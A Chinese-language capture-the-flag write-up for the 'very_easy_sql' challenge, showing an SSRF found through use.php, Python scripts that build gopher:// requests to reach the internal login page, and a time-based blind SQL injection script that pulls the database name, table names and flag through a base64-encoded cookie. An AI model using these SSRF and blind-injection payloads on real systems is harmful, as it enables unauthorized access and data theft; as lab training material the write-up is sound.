攻防世界 -- very_easy_sql

先看题 题目描述什么也没有

点进去题目场景看看

you are not an inner user, so we can not let you have identify~ 只能内部访问登录

看下页面源代码

16行 有一行注释 把use.php加到URL后边看一下

到这可以判断出是SSRF 先写个playload 实现内部访问

import urllib.parse

host = "127.0.0.1:80"
content = "uname=admin&passwd=admin"
content_length = len(content)

test =
"""POST /index.php HTTP/1.1
Host: {}
User-Agent: curl/7.43.0
Accept: /
Content-Type: application/x-www-form-urlencoded
Content-Length: {}

{}
""".format(host,content_length,content)

tmp = urllib.parse.quote(test)
new = tmp.replace("%0A","%0D%0A")
result = urllib.parse.quote(new)
print("gopher://"+host+"/_"+result)

然后用BP抓包

返回值里有一个Set-Cookie 解码看看

解码结果就是admin 这个cookie 就是注入点 重新写一个payload 由于无回显 现在用sleep盲注 构造语句 admin') and if(1,sleep(10),1)#

进行编码

payload如下：

import urllib.parse

host = "127.0.0.1:80"
cookie="this_is_your_cookie=YWRtaW4nKSBhbmQgaWYoMSxzbGVlcCgxMCksMSkj"

test =
"""GET /index.php HTTP/1.1
Host: {}
Connection: close
Content-Type: application/x-www-form-urlencoded
Cookie:{}

""".format(host,cookie)

tmp = urllib.parse.quote(test)
new = tmp.replace("%0A","%0D%0A")
result = urllib.parse.quote(new)
print("gopher://"+host+"/_"+result)

然后继续用BP抓包看看

构造payload脚本

import urllib.parse
import requests
import time
import base64
url="http://61.147.171.105:53185//use.php?url="
flag=""
for pos in range(1,50):
    for i in range(33,127):
        #poc="') union select 1,2,if(1=1,sleep(5),1) # "

        #security
        #poc="') union select 1,2,if(ascii( substr((database()),"+str(pos)+",1) )="+str(i)+",sleep(2),1) # "

        #flag
        #poc="') union select 1,2,if(ascii( substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),"+str(pos)+",1) )="+str(i)+",sleep(2),1) # "
        
        poc="') union select 1,2,if(ascii( substr((select * from flag),"+str(pos)+",1) )="+str(i)+",sleep(2),1) # "
        
        bs = str(base64.b64encode(poc.encode("utf-8")), "utf-8")
        final_poc="gopher://127.0.0.1:80/_GET%20%2findex.php%20HTTP%2f1.1%250d%250aHost%3A%20localhost%3A80%250d%250aConnection%3A%20close%250d%250aContent-Type%3A%20application%2fx-www-form-urlencoded%250d%250aCookie%3A%20this%5Fis%5Fyour%5Fcookie%3D"+bs+"%3B%250d%250a"
        t1=time.time()
        res=requests.get(url+final_poc)
        t2=time.time()
        if(t2-t1>2):
            flag+=chr(i)
            print(flag)
            break
print(flag)

python跑一下

提交flag